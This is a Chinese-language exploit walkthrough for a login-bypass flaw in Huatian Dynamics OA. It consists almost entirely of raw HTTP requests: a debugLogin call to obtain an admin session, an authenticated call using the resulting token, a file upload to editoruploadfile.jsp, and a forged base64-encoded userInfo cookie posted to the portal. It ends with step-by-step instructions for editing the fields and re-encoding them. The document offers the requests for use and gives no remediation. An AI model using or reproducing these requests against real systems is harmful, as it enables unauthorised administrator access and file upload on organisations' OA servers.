华天动力OA登录绕过漏洞利用

POST /OAapp/HtEntranceService.do HTTP/1.1Host: xxxContent-Length: 64Pragma: no-cacheContent-Security-Policy: default-src 'self'; script-src 'self'; frame-ancestors 'self'; object-src 'none'Strict-Transport-Security: max-age=63072000; includeSubdomains; preloadX-Content-Type-Options: nosniffUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept: application/json, text/plain, */*Cache-Control: no-cacheX-XSS-Protection: 1Origin: http://xxxReferer: http://xxx/OAapp/htpages/app/module/login/8.0Login.jspAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

{"service":"debugService","method":"debugLogin","code":"admin"}

替换code与userShowId，修改params。

POST /OAapp/HtEntranceService.do HTTP/1.1Host: xxxContent-Length: 176Pragma: no-cacheContent-Security-Policy: default-src 'self'; script-src 'self'; frame-ancestors 'self'; object-src 'none'Strict-Transport-Security: max-age=63072000; includeSubdomains; preloadX-Content-Type-Options: nosniffUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept: application/json, text/plain, */*Cache-Control: no-cacheX-XSS-Protection: 1Origin: http://xxxReferer: http://xxx/OAapp/htpages/app/module/portal_FLOW/view/8.0MainPor.jspAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: OA_USER_SHOW_ID=admin; OA_USER_KEY=ebb3d4f06b71442facf28c07805c6a70Connection: close

{"userId":"admin","code":"IM_52ae810f362f412d818f68248ce7c1fe","params":[{"serviceName":"commService","methodName":"getUserFunctionDictForMenuList","params":"WycnXQx7x;x7x;"}]}

替换token与userShowId

POST /OAapp/jsp/editoruploadfile.jsp HTTP/1.1Host: xxxContent-Length: 429Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryarQUT0ifqOXqkZdEOrigin: http://xxxReferer: http://xxx/OAapp/htpages/app/module/portal_FLOW/view/8.0MainPor.jspAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

------WebKitFormBoundaryarQUT0ifqOXqkZdEContent-Disposition: form-data; name="ajaxTaskFile"; filename="1111.png"Content-Type: image/png

1111111111111------WebKitFormBoundaryarQUT0ifqOXqkZdEContent-Disposition: form-data; name="token"

IM_0c9308b00087459791e97d7e8eec2bb8------WebKitFormBoundaryarQUT0ifqOXqkZdEContent-Disposition: form-data; name="userShowId"

admin------WebKitFormBoundaryarQUT0ifqOXqkZdE--

IE：/OAapp/htpages/app/module/portal_IE8/view/8.0MainPor.jsp

POST /OAapp/htpages/app/module/portal_FLOW/view/8.0MainPor.jsp HTTP/1.1Host: xxxContent-Length: 636Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: http://xxxContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://xxx/OAapp/htpages/app/module/login/8.0Login.jspAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: OA_USER_SHOW_ID=admin; OA_USER_KEY=ebb3d4f06b71442facf28c07805c6a70Connection: close

userInfo=eyJvdGhlckluZm9Nb2RlbCI6IjExMTEiLCJ1c2VyU2hvd0lkIjoiYWRtaW4iLCJyZWFsVXNlcklkIjoiYWRtaSIsInVzZXJOYW1lIjoi566h55CG5ZGYIiwiZGVwdElkIjoiUk9PVCIsImRlcHROYW1lIjoiMTExMSIsImNvbXBhbnlJZCI6IlJPT1QiLCJjb21wYW55TmFtZSI6IjExMTEiLCJsYW5ndWFnZVR5cGUiOiJDTiIsInNob3dUeXBlIjowLCJjb2RlIjoiSU1fNTJhZTgxMGYzNjJmNDEyZDgxOGY2ODI0OGNlN2MxZmUiLCJyYW5kb21Db2RlIjoiSU1fNTJhZTgxMGYzNjJmNDEyZDgxOGY2ODI0OGNlN2MxZmUiLCJ2ZXJzaW9uVG9rZW4iOiIxMC4yMC0xIiwiZGVidWdGbGciOiIwIiwiY29sb3JTdHlsZSI6IkJMVUUiLCJjdXJyZW50Q3NzUGF0aCI6Ii9PQWFwcC9odHBhZ2VzL2FwcC9jc3MvQ04vcHVibGljLyIsInBvcnRhbFR5cGUiOiJfRkxPVyIsInBpbnlpbiI6ImFkbWluIiwic3VwZXJNYW5hZ2VyRmxnIjpmYWxzZX0x7x;

userinfo组成：

{"otherInfoModel":"eyJqc3BUaXRsZSI6IuaIkOWKnyIsImNoYW5nZVBzZEZsZyI6ZmFsc2UsImRlZmF1bHRDb2xvclN0eWxlIjp7InRoZW1lSUQiOiIxMCIsIm5hdmJhckhlYWRlckNvbG9yIjoiYmctZGFya0JsdWUgYmctaGVhZGVyLWRhcmtCbHVlIiwibmF2YmFyQ29sbGFwc2VDb2xvciI6ImJnLWRhcmtCbHVlIiwiYXNpZGVDb2xvciI6ImJnLWxlZnQtZGFya0JsdWUiLCJjb250ZW50Q29sb3IiOiJodC1kYXJrQmx1ZSIsImhlYWRlckZpeGVkIjp0cnVlLCJhc2lkZUZpeGVkIjp0cnVlLCJhc2lkZUZvbGRlZCI6ZmFsc2UsImFzaWRlRG9jayI6ZmFsc2UsIm5vSGVhZENzcyI6IiIsImNvbnRhaW5lciI6ZmFsc2V9fQx7x;x7x;","userShowId":"admin","realUserId":"admi","userName":"管理员","deptId":"ROOT","deptName":"aaa","companyId":"ROOT","companyName":"aaa","languageType":"CN","showType":0,"code":"IM_52ae810f362f412d818f68248ce7c1fe","randomCode":"IM_52ae810f362f412d818f68248ce7c1fe","versionToken":"10.20-1","debugFlg":"0","colorStyle":"BLUE","currentCssPath":"/OAapp/htpages/app/css/CN/public/","portalType":"_FLOW","headPhotoId":"","pinyin":"admin","superManagerFlg":false}

otherInfoModel组成：

{"jspTitle":"成功","changePsdFlg":false,"defaultColorStyle":{"themeID":"1","navbarHeaderColor":" bg-info bg-header-info","navbarCollapseColor":"bg-info","asideColor":"bg-left-info","contentColor":"ht-blue","headerFixed":true,"asideFixed":true,"asideFolded":false,"asideDock":false,"noHeadCss":"","container":false}}

需要替换相关用户名字段(userShowId、realUserId、pinyin)、code、randomcode，以及otherInfoModel中的defaultColorStyle，这些信息在debugLogin请求的响应包base64解密后都能看到。

替换之后需要对otherInfoModel base64编码，替换=为x7x;   +为x6x; 之后替换userinfo中的otherInfoModel。

然后需要对修改后的userinfo整体，base64编码，之后替换=为x7x;    +为x6x;